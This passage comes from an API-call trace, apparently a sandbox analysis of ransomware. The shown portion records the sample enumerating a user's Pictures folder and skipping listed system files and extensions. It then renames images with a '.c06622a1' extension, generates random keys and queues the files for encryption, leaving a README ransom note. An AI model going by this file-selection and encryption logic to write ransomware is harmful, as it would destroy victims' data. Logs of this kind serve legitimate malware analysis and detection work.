dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x65c [0155.417] SetFilePointerEx (in: hFile=0x65c, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.417] ReadFile (in: hFile=0x65c, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0155.418] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x5edd750f [0155.418] RtlComputeCrc32 (PartialCrc=0x750f, Buffer=0x3feb74, Length=0x80) returned 0xeceba6e9 [0155.418] RtlComputeCrc32 (PartialCrc=0xa6e9, Buffer=0x3feb74, Length=0x80) returned 0xb7684dd3 [0155.418] RtlComputeCrc32 (PartialCrc=0x4dd3, Buffer=0x3feb74, Length=0x80) returned 0x54732e58 [0155.418] RtlComputeCrc32 (PartialCrc=0x2e58, Buffer=0x3feb74, Length=0x80) returned 0xff9682d7 [0155.418] CloseHandle (hObject=0x65c) returned 1 [0155.418] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.418] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg" [0155.418] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg") returned 0x3c [0155.418] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.418] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\melgzpehbj5nw.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\melgzpehbj5nw.jpg.c06622a1"), dwFlags=0x8) returned 1 [0155.420] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\melgzpehBJ5nW.jpg.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\melgzpehbj5nw.jpg.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x65c [0155.420] CreateIoCompletionPort (FileHandle=0x65c, ExistingCompletionPort=0x5dc, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5dc [0155.420] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x41f0020 [0155.425] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6e04640b [0155.425] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x20d11266 [0155.426] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x324d710b [0155.426] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x65148e84 [0155.426] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0xe01561a [0155.426] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x4dd62f88 [0155.426] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x72d3051 [0155.426] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x51617214 [0155.429] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x41f0094, Length=0x80) returned 0x11c397d0 [0155.429] RtlComputeCrc32 (PartialCrc=0x97d0, Buffer=0x41f0094, Length=0x80) returned 0x482a0883 [0155.429] RtlComputeCrc32 (PartialCrc=0x883, Buffer=0x41f0094, Length=0x80) returned 0xfc4a6d4a [0155.429] RtlComputeCrc32 (PartialCrc=0x6d4a, Buffer=0x41f0094, Length=0x80) returned 0x53b6eacb [0155.429] RtlComputeCrc32 (PartialCrc=0xeacb, Buffer=0x41f0094, Length=0x80) returned 0xf39703a3 [0155.429] PostQueuedCompletionStatus (CompletionPort=0x5dc, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x41f0020) returned 1 [0155.429] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0155.429] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0155.429] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1af44270, ftCreationTime.dwHighDateTime=0x1d5e76b, ftLastAccessTime.dwLowDateTime=0xdb3a2d90, ftLastAccessTime.dwHighDateTime=0x1d5db74, ftLastWriteTime.dwLowDateTime=0xdb3a2d90, ftLastWriteTime.dwHighDateTime=0x1d5db74, nFileSizeHigh=0x0, nFileSizeLow=0x7828, dwReserved0=0x0, dwReserved1=0x0, cFileName="Nmf7WVuIO_hm0.png", cAlternateFileName="NMF7WV~1.PNG")) returned 1 [0155.429] _wcsicmp (_Str1="Nmf7WVuIO_hm0.png", _Str2="README.c06622a1.TXT") returned -4 [0155.429] wcsstr (_Str="Nmf7WVuIO_hm0.png", _SubStr="README") returned 0x0 [0155.429] _wcsicmp (_Str1="autorun.inf", _Str2="Nmf7WVuIO_hm0.png") returned -13 [0155.429] wcslen (_String="autorun.inf") returned 0xb [0155.429] _wcsicmp (_Str1="boot.ini", _Str2="Nmf7WVuIO_hm0.png") returned -12 [0155.429] wcslen (_String="boot.ini") returned 0x8 [0155.429] _wcsicmp (_Str1="bootfont.bin", _Str2="Nmf7WVuIO_hm0.png") returned -12 [0155.429] wcslen (_String="bootfont.bin") returned 0xc [0155.429] _wcsicmp (_Str1="bootsect.bak", _Str2="Nmf7WVuIO_hm0.png") returned -12 [0155.429] wcslen (_String="bootsect.bak") returned 0xc [0155.429] _wcsicmp (_Str1="desktop.ini", _Str2="Nmf7WVuIO_hm0.png") returned -10 [0155.429] wcslen (_String="desktop.ini") returned 0xb [0155.429] _wcsicmp (_Str1="iconcache.db", _Str2="Nmf7WVuIO_hm0.png") returned -5 [0155.429] wcslen (_String="iconcache.db") returned 0xc [0155.429] _wcsicmp (_Str1="ntldr", _Str2="Nmf7WVuIO_hm0.png") returned 7 [0155.429] wcslen (_String="ntldr") returned 0x5 [0155.429] _wcsicmp (_Str1="ntuser.dat", _Str2="Nmf7WVuIO_hm0.png") returned 7 [0155.429] wcslen (_String="ntuser.dat") returned 0xa [0155.429] _wcsicmp (_Str1="ntuser.dat.log", _Str2="Nmf7WVuIO_hm0.png") returned 7 [0155.429] wcslen (_String="ntuser.dat.log") returned 0xe [0155.429] _wcsicmp (_Str1="ntuser.ini", _Str2="Nmf7WVuIO_hm0.png") returned 7 [0155.430] wcslen (_String="ntuser.ini") returned 0xa [0155.430] _wcsicmp (_Str1="thumbs.db", _Str2="Nmf7WVuIO_hm0.png") returned 6 [0155.430] wcslen (_String="thumbs.db") returned 0x9 [0155.430] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.430] wcslen (_String="386") returned 0x3 [0155.430] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.430] wcslen (_String="adv") returned 0x3 [0155.430] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.430] wcslen (_String="ani") returned 0x3 [0155.430] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.430] wcslen (_String="bat") returned 0x3 [0155.430] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.430] wcslen (_String="bin") returned 0x3 [0155.430] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.430] wcslen (_String="cab") returned 0x3 [0155.430] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.430] wcslen (_String="cmd") returned 0x3 [0155.430] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.430] wcslen (_String="com") returned 0x3 [0155.430] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.430] wcslen (_String="cpl") returned 0x3 [0155.430] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.430] wcslen (_String="cur") returned 0x3 [0155.430] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.430] wcslen (_String="deskthemepack") returned 0xd [0155.430] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.430] wcslen (_String="diagcab") returned 0x7 [0155.430] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.430] wcslen (_String="diagcfg") returned 0x7 [0155.430] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.430] wcslen (_String="diagpkg") returned 0x7 [0155.430] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.430] wcslen (_String="dll") returned 0x3 [0155.430] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.430] wcslen (_String="drv") returned 0x3 [0155.430] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.430] wcslen (_String="exe") returned 0x3 [0155.431] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.431] wcslen (_String="hlp") returned 0x3 [0155.431] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.431] wcslen (_String="icl") returned 0x3 [0155.431] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.431] wcslen (_String="icns") returned 0x4 [0155.431] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.431] wcslen (_String="ico") returned 0x3 [0155.431] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.431] wcslen (_String="ics") returned 0x3 [0155.431] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.431] wcslen (_String="idx") returned 0x3 [0155.431] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.431] wcslen (_String="ldf") returned 0x3 [0155.431] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.431] wcslen (_String="lnk") returned 0x3 [0155.431] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.431] wcslen (_String="mod") returned 0x3 [0155.431] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.431] wcslen (_String="mpa") returned 0x3 [0155.431] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.431] wcslen (_String="msc") returned 0x3 [0155.431] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.431] wcslen (_String="msp") returned 0x3 [0155.431] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.431] wcslen (_String="msstyles") returned 0x8 [0155.431] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.431] wcslen (_String="msu") returned 0x3 [0155.431] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.431] wcslen (_String="nls") returned 0x3 [0155.431] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.431] wcslen (_String="nomedia") returned 0x7 [0155.431] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.431] wcslen (_String="ocx") returned 0x3 [0155.431] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.431] wcslen (_String="prf") returned 0x3 [0155.431] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.431] wcslen (_String="ps1") returned 0x3 [0155.431] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.432] wcslen (_String="rom") returned 0x3 [0155.432] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.432] wcslen (_String="rtp") returned 0x3 [0155.432] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.432] wcslen (_String="scr") returned 0x3 [0155.432] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.432] wcslen (_String="shs") returned 0x3 [0155.432] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.432] wcslen (_String="spl") returned 0x3 [0155.432] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.432] wcslen (_String="sys") returned 0x3 [0155.432] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.432] wcslen (_String="theme") returned 0x5 [0155.432] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.432] wcslen (_String="themepack") returned 0x9 [0155.432] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.432] wcslen (_String="wpx") returned 0x3 [0155.432] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.432] wcslen (_String="lock") returned 0x4 [0155.432] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.432] wcslen (_String="key") returned 0x3 [0155.432] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.432] wcslen (_String="hta") returned 0x3 [0155.432] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.432] wcslen (_String="msi") returned 0x3 [0155.432] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.432] wcslen (_String="pdb") returned 0x3 [0155.432] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.432] wcslen (_String="sql") returned 0x3 [0155.432] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.432] wcslen (_String="sqlite") returned 0x6 [0155.432] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures")) returned 0x11 [0155.432] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44d0078 [0155.432] wcscpy (in: _Dest=0x44d0078, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures" [0155.433] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures") returned 0x2a [0155.433] wcscpy (in: _Dest=0x44d00ce, _Source="Nmf7WVuIO_hm0.png" | out: _Dest="Nmf7WVuIO_hm0.png") returned="Nmf7WVuIO_hm0.png" [0155.433] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png", dwFileAttributes=0x80) returned 1 [0155.433] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nmf7wvuio_hm0.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x674 [0155.433] SetFilePointerEx (in: hFile=0x674, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0155.433] ReadFile (in: hFile=0x674, lpBuffer=0x3feb74, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x3fec04, lpOverlapped=0x0 | out: lpBuffer=0x3feb74*, lpNumberOfBytesRead=0x3fec04*=0x90, lpOverlapped=0x0) returned 1 [0155.434] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x3feb74, Length=0x80) returned 0x6618190d [0155.434] RtlComputeCrc32 (PartialCrc=0x190d, Buffer=0x3feb74, Length=0x80) returned 0xef571cb9 [0155.434] RtlComputeCrc32 (PartialCrc=0x1cb9, Buffer=0x3feb74, Length=0x80) returned 0x1acc2ffd [0155.434] RtlComputeCrc32 (PartialCrc=0x2ffd, Buffer=0x3feb74, Length=0x80) returned 0x822b2891 [0155.434] RtlComputeCrc32 (PartialCrc=0x2891, Buffer=0x3feb74, Length=0x80) returned 0xcf2c3d19 [0155.434] CloseHandle (hObject=0x674) returned 1 [0155.434] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x10000) returned 0x44e0080 [0155.434] wcscpy (in: _Dest=0x44e0080, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png" [0155.434] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png") returned 0x3c [0155.434] wcscpy (in: _Dest=0x44e00f8, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0155.434] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nmf7wvuio_hm0.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nmf7wvuio_hm0.png.c06622a1"), dwFlags=0x8) returned 1 [0155.437] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\Nmf7WVuIO_hm0.png.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\nmf7wvuio_hm0.png.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x674 [0155.437] CreateIoCompletionPort (FileHandle=0x674, ExistingCompletionPort=0x5e0, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x5e0 [0155.437] RtlAllocateHeap (HeapHandle=0x4c0000, Flags=0x0, Size=0x80104) returned 0x4280020 [0155.442] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2bf1e6c7 [0155.442] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x73b9e2d6 [0155.442] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x5239e4f9 [0155.442] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x6368a541 [0155.443] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x68fdc5bf [0155.443] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x2b33a21 [0155.443] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x7ada2098 [0155.443] RtlRandomEx (in: Seed=0xf51018 | out: Seed=0xf51018) returned 0x164cd817 [0155.446] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x4280094, Length=0x80) returned 0x2520055a [0155.446] RtlComputeCrc32 (PartialCrc=0x55a, Buffer=0x4280094, Length=0x80) returned 0x1ffa9da8 [0155.446] RtlComputeCrc32 (PartialCrc=0x9da8, Buffer=0x4280094, Length=0x80) returned 0x7c1a6a48 [0155.446] RtlComputeCrc32 (PartialCrc=0x6a48, Buffer=0x4280094, Length=0x80) returned 0xf765a26 [0155.446] RtlComputeCrc32 (PartialCrc=0x5a26, Buffer=0x4280094, Length=0x80) returned 0x6a843955 [0155.446] PostQueuedCompletionStatus (CompletionPort=0x5e0, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x4280020) returned 1 [0155.446] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44d0078) returned 1 [0155.446] RtlFreeHeap (HeapHandle=0x4c0000, Flags=0x0, BaseAddress=0x44e0080) returned 1 [0155.446] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdb364320, ftCreationTime.dwHighDateTime=0x1d6f256, ftLastAccessTime.dwLowDateTime=0xdb364320, ftLastAccessTime.dwHighDateTime=0x1d6f256, ftLastWriteTime.dwLowDateTime=0xdb364320, ftLastWriteTime.dwHighDateTime=0x1d6f256, nFileSizeHigh=0x0, nFileSizeLow=0xa8f, dwReserved0=0x0, dwReserved1=0x0, cFileName="README.c06622a1.TXT", cAlternateFileName="README~1.TXT")) returned 1 [0155.446] _wcsicmp (_Str1="README.c06622a1.TXT", _Str2="README.c06622a1.TXT") returned 0 [0155.446] FindNextFileW (in: hFindFile=0x2db8740, lpFindFileData=0x3fecec | out: lpFindFileData=0x3fecec*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6b417d10, ftCreationTime.dwHighDateTime=0x1d5e7f7, ftLastAccessTime.dwLowDateTime=0x62d33c70, ftLastAccessTime.dwHighDateTime=0x1d5da2a, ftLastWriteTime.dwLowDateTime=0x62d33c70, ftLastWriteTime.dwHighDateTime=0x1d5da2a, nFileSizeHigh=0x0, nFileSizeLow=0x6d5a, dwReserved0=0x0, dwReserved1=0x0, cFileName="z-m538Ne.png", cAlternateFileName="")) returned 1 [0155.446] _wcsicmp (_Str1="z-m538Ne.png", _Str2="README.c06622a1.TXT") returned 8 [0155.446] wcsstr (_Str="z-m538Ne.png", _SubStr="README") returned 0x0 [0155.446] _wcsicmp (_Str1="autorun.inf", _Str2="z-m538Ne.png") returned -25 [0155.446] wcslen (_String="autorun.inf") returned 0xb [0155.446] _wcsicmp (_Str1="boot.ini", _Str2="z-m538Ne.png") returned -24 [0155.446] wcslen (_String="boot.ini") returned 0x8 [0155.446] _wcsicmp (_Str1="bootfont.bin", _Str2="z-m538Ne.png") returned -24 [0155.446] wcslen (_String="bootfont.bin") returned 0xc [0155.446] _wcsicmp (_Str1="bootsect.bak", _Str2="z-m538Ne.png") returned -24 [0155.446] wcslen (_String="bootsect.bak") returned 0xc [0155.446] _wcsicmp (_Str1="desktop.ini", _Str2="z-m538Ne.png") returned -22 [0155.446] wcslen (_String="desktop.ini") returned 0xb [0155.446] _wcsicmp (_Str1="iconcache.db", _Str2="z-m538Ne.png") returned -17 [0155.446] wcslen (_String="iconcache.db") returned 0xc [0155.446] _wcsicmp (_Str1="ntldr", _Str2="z-m538Ne.png") returned -12 [0155.446] wcslen (_String="ntldr") returned 0x5 [0155.446] _wcsicmp (_Str1="ntuser.dat", _Str2="z-m538Ne.png") returned -12 [0155.446] wcslen (_String="ntuser.dat") returned 0xa [0155.446] _wcsicmp (_Str1="ntuser.dat.log", _Str2="z-m538Ne.png") returned -12 [0155.446] wcslen (_String="ntuser.dat.log") returned 0xe [0155.446] _wcsicmp (_Str1="ntuser.ini", _Str2="z-m538Ne.png") returned -12 [0155.447] wcslen (_String="ntuser.ini") returned 0xa [0155.447] _wcsicmp (_Str1="thumbs.db", _Str2="z-m538Ne.png") returned -6 [0155.447] wcslen (_String="thumbs.db") returned 0x9 [0155.447] _wcsicmp (_Str1="386", _Str2="png") returned -61 [0155.447] wcslen (_String="386") returned 0x3 [0155.447] _wcsicmp (_Str1="adv", _Str2="png") returned -15 [0155.447] wcslen (_String="adv") returned 0x3 [0155.447] _wcsicmp (_Str1="ani", _Str2="png") returned -15 [0155.447] wcslen (_String="ani") returned 0x3 [0155.447] _wcsicmp (_Str1="bat", _Str2="png") returned -14 [0155.447] wcslen (_String="bat") returned 0x3 [0155.447] _wcsicmp (_Str1="bin", _Str2="png") returned -14 [0155.447] wcslen (_String="bin") returned 0x3 [0155.447] _wcsicmp (_Str1="cab", _Str2="png") returned -13 [0155.447] wcslen (_String="cab") returned 0x3 [0155.447] _wcsicmp (_Str1="cmd", _Str2="png") returned -13 [0155.447] wcslen (_String="cmd") returned 0x3 [0155.447] _wcsicmp (_Str1="com", _Str2="png") returned -13 [0155.447] wcslen (_String="com") returned 0x3 [0155.447] _wcsicmp (_Str1="cpl", _Str2="png") returned -13 [0155.447] wcslen (_String="cpl") returned 0x3 [0155.447] _wcsicmp (_Str1="cur", _Str2="png") returned -13 [0155.447] wcslen (_String="cur") returned 0x3 [0155.447] _wcsicmp (_Str1="deskthemepack", _Str2="png") returned -12 [0155.447] wcslen (_String="deskthemepack") returned 0xd [0155.447] _wcsicmp (_Str1="diagcab", _Str2="png") returned -12 [0155.447] wcslen (_String="diagcab") returned 0x7 [0155.447] _wcsicmp (_Str1="diagcfg", _Str2="png") returned -12 [0155.447] wcslen (_String="diagcfg") returned 0x7 [0155.447] _wcsicmp (_Str1="diagpkg", _Str2="png") returned -12 [0155.447] wcslen (_String="diagpkg") returned 0x7 [0155.447] _wcsicmp (_Str1="dll", _Str2="png") returned -12 [0155.447] wcslen (_String="dll") returned 0x3 [0155.447] _wcsicmp (_Str1="drv", _Str2="png") returned -12 [0155.447] wcslen (_String="drv") returned 0x3 [0155.447] _wcsicmp (_Str1="exe", _Str2="png") returned -11 [0155.447] wcslen (_String="exe") returned 0x3 [0155.447] _wcsicmp (_Str1="hlp", _Str2="png") returned -8 [0155.448] wcslen (_String="hlp") returned 0x3 [0155.448] _wcsicmp (_Str1="icl", _Str2="png") returned -7 [0155.448] wcslen (_String="icl") returned 0x3 [0155.448] _wcsicmp (_Str1="icns", _Str2="png") returned -7 [0155.448] wcslen (_String="icns") returned 0x4 [0155.448] _wcsicmp (_Str1="ico", _Str2="png") returned -7 [0155.448] wcslen (_String="ico") returned 0x3 [0155.448] _wcsicmp (_Str1="ics", _Str2="png") returned -7 [0155.448] wcslen (_String="ics") returned 0x3 [0155.448] _wcsicmp (_Str1="idx", _Str2="png") returned -7 [0155.448] wcslen (_String="idx") returned 0x3 [0155.448] _wcsicmp (_Str1="ldf", _Str2="png") returned -4 [0155.448] wcslen (_String="ldf") returned 0x3 [0155.448] _wcsicmp (_Str1="lnk", _Str2="png") returned -4 [0155.448] wcslen (_String="lnk") returned 0x3 [0155.448] _wcsicmp (_Str1="mod", _Str2="png") returned -3 [0155.448] wcslen (_String="mod") returned 0x3 [0155.448] _wcsicmp (_Str1="mpa", _Str2="png") returned -3 [0155.448] wcslen (_String="mpa") returned 0x3 [0155.448] _wcsicmp (_Str1="msc", _Str2="png") returned -3 [0155.448] wcslen (_String="msc") returned 0x3 [0155.448] _wcsicmp (_Str1="msp", _Str2="png") returned -3 [0155.448] wcslen (_String="msp") returned 0x3 [0155.448] _wcsicmp (_Str1="msstyles", _Str2="png") returned -3 [0155.448] wcslen (_String="msstyles") returned 0x8 [0155.448] _wcsicmp (_Str1="msu", _Str2="png") returned -3 [0155.448] wcslen (_String="msu") returned 0x3 [0155.448] _wcsicmp (_Str1="nls", _Str2="png") returned -2 [0155.448] wcslen (_String="nls") returned 0x3 [0155.448] _wcsicmp (_Str1="nomedia", _Str2="png") returned -2 [0155.448] wcslen (_String="nomedia") returned 0x7 [0155.448] _wcsicmp (_Str1="ocx", _Str2="png") returned -1 [0155.448] wcslen (_String="ocx") returned 0x3 [0155.448] _wcsicmp (_Str1="prf", _Str2="png") returned 4 [0155.448] wcslen (_String="prf") returned 0x3 [0155.448] _wcsicmp (_Str1="ps1", _Str2="png") returned 5 [0155.448] wcslen (_String="ps1") returned 0x3 [0155.448] _wcsicmp (_Str1="rom", _Str2="png") returned 2 [0155.448] wcslen (_String="rom") returned 0x3 [0155.449] _wcsicmp (_Str1="rtp", _Str2="png") returned 2 [0155.449] wcslen (_String="rtp") returned 0x3 [0155.449] _wcsicmp (_Str1="scr", _Str2="png") returned 3 [0155.449] wcslen (_String="scr") returned 0x3 [0155.449] _wcsicmp (_Str1="shs", _Str2="png") returned 3 [0155.449] wcslen (_String="shs") returned 0x3 [0155.449] _wcsicmp (_Str1="spl", _Str2="png") returned 3 [0155.449] wcslen (_String="spl") returned 0x3 [0155.449] _wcsicmp (_Str1="sys", _Str2="png") returned 3 [0155.449] wcslen (_String="sys") returned 0x3 [0155.449] _wcsicmp (_Str1="theme", _Str2="png") returned 4 [0155.449] wcslen (_String="theme") returned 0x5 [0155.449] _wcsicmp (_Str1="themepack", _Str2="png") returned 4 [0155.449] wcslen (_String="themepack") returned 0x9 [0155.449] _wcsicmp (_Str1="wpx", _Str2="png") returned 7 [0155.449] wcslen (_String="wpx") returned 0x3 [0155.449] _wcsicmp (_Str1="lock", _Str2="png") returned -4 [0155.449] wcslen (_String="lock") returned 0x4 [0155.449] _wcsicmp (_Str1="key", _Str2="png") returned -5 [0155.449] wcslen (_String="key") returned 0x3 [0155.449] _wcsicmp (_Str1="hta", _Str2="png") returned -8 [0155.449] wcslen (_String="hta") returned 0x3 [0155.449] _wcsicmp (_Str1="msi", _Str2="png") returned -3 [0155.449] wcslen (_String="msi") returned 0x3 [0155.449] _wcsicmp (_Str1="pdb", _Str2="png") returned -10 [0155.449] wcslen (_String="pdb") returned 0x3 [0155.449] _wcsicmp (_Str1="sql", _Str2="png") returned 3 [0155.449] wcslen (_String="sql") returned 0x3 [0155.449] _wcsicmp (_Str1="sqlite", _Str2="png") returned 3 [0155.449] wcslen (_String="sqlite") returned 0x6 